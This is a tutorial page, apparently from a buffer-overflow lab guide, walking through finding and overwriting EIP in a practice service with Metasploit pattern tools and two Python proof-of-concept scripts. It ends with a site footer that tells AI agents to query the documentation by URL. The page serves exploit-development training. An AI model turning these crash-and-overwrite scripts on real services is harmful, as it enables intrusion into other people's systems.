# Controlling the EIP

## Creating Pattern

```
msf-pattern_create -l 600
```

![](/files/-Mdc9bP16twsh759IMUu)

## Update POC

After creating the pattern, modify the code from the previous iteration (Crasher.py) to send the newly generated pattern as the buffer instead.

### controllingEip.py

```
#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    buffer = prefix + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")
```

### Controlling Eip

```
python controllingEip.py
```

![](/files/-MdcA1ZKr1UmsGVcnS16)

![](/files/-MdcAHXtp2bNQwijy4cr)

`EIP = 41397241`

Further inspecting the registers, as shown above, reveals that our EIP now has a unique value instead of the 4 bytes of “\x41” OR “A” we saw in the previous iteration.

## Locating EIP

Now that we have sent in our custom pattern and extracted the value @ EIP, we have to figure out where that is in the buffer. The tool ”msf-pattern\_offset” will help us with that.

```
msf-pattern_offset -l 600 -q 41397241
```

![](/files/-MdcAmNnIMkUTJoktZxs)

`EIP Was found at 537 Bytes`

### controlledEip.py

Now let's verify that by further modifying our initial code, we are able to write 4 `B`s OR 4 bytes of `\x42` into the EIP.

```
#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537
    eip = "B" * 4
    buffer = prefix + filler + eip

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")
```

### Controlled Eip

```
python controlledEip.py
```

![](/files/-MdcBEg3WuZMinHv3Eh8)

![](/files/-MdcBG867pBI4W3H1oRi)

After running the new exploit code, we are able to see that we have successfully over-written the EIP with `\x42\x42\x42\x42`. Now we have gained control of the EIP and are ready to move on to the next step.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://repo.4pfsec.com/buffer-overflow/remote-buffer-overflow/controlling-the-eip.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.